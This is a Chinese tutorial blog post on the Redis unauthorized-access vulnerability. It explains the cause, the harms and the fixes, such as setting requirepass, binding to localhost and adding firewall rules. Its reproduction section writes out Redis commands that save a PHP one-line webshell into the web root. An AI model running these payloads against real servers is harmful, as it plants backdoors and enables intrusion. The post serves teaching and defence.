Redis未授权访问漏洞

redis简介

redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步。

漏洞原理

  1. redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。
  2. 没有设置密码认证(一般为空)或者设置弱口令密码,导致任何用户可以远程登录redis服务。

漏洞危害:

(1) 攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据;
(2) 攻击者可通过执行lua代码,或通过数据备份功能往磁盘写入后门文件;
(3) 最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器;

漏洞复现

扫描靶机端口,看是否开放6379端口

发现6379开放,且是redis服务,于是用redis客户端直接连接,看是否存在密码。使用info命令i查看基本信息。 

发现没有密码,可以直接登录,info命令有回显。证明存在redis未授权访问漏洞。

写入一句话木马

config set dir /var/www/html/ 
config set  dbfilename shell.php 
set x "<?php eval($_POST['cmd']);?>" 
或者:
set shell "\r\n\r\n<?php @eval($_POST['cmd']);?>\r\n\r\n"
save

 防御方法

1、禁止外部访问Redis服务端口;
2、禁止使用root权限启动redis服务;
3、配置安全组,限制可连接Redis服务器的IP;

### Redis 未授权访问漏洞解决方案与预防方法 #### 检测 Redis 未授权访问漏洞 为了有效检测 Redis 实例是否存在未授权访问漏洞,可以采取以下措施: - **网络扫描工具**:使用 Nmap 或其他类似的网络安全扫描工具来识别开放的 Redis 端口,默认情况下为 6379。如果此端口对外网可见,则可能存在风险[^1]。 - **尝试连接测试**:通过命令行客户端或其他编程接口直接向目标 IP 地址发送请求并接收响应数据包;若能成功获取到服务器返回的信息而无需身份验证,则说明存在安全隐患。 ```bash redis-cli -h <target_ip> ``` #### 利用 Redis 未授权访问漏洞的风险评估 一旦确认了 Redis 存在一个可被外部访问且不需要认证就能操作的情况,攻击者可能会执行如下恶意行为: - 获取敏感信息:读取配置文件、数据库备份等重要资料; - 修改键值对内容:篡改业务逻辑所需的数据存储结构; - 执行任意代码:当启用了 Lua 脚本支持功能时,可能允许远程执行系统级指令; - 进一步渗透内网环境:作为跳板机进一步探索内部资源和服务。 这些潜在威胁严重违反了信息安全原则中的保密性和完整性要求,并可能导致严重的经济损失和社会影响。 #### 解决方案与防护策略 针对上述提到的安全隐患,建议实施以下改进措施以增强系统的安全性: - **设置密码保护机制**:修改 `requirepass` 参数指定一个强健复杂的字符串作为登录凭证,在每次发起请求之前都需要提供正确的凭据才能继续交互过程。 ```conf requirepass your_strong_password_here ``` - **绑定本地地址监听**:除非确实有必要让公网能够触及到 Redis 服务实例,否则应当将其限定于仅限局域网内的特定主机之间通信,即把 bind 配置项设为空白或 localhost 即可实现这一目的。 ```conf bind 127.0.0.1 ::1 ``` - **启用防火墙规则控制流量进出方向**:借助 iptables/AWS Security Groups 等手段严格限制哪些源IP范围才具备合法权限去接触Redis进程所占用的那个TCP端口号上的套接字对象。 - **定期审查日志记录情况**:开启慢查询日志以及常规的操作历史追踪特性有助于及时发现异常活动迹象以便快速做出反应处理。 - **更新至最新稳定版软件发行版本**:官方团队会持续不断地修复已知缺陷和优化性能表现,因此保持应用程序处于最新的状态对于维护整体架构稳健至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值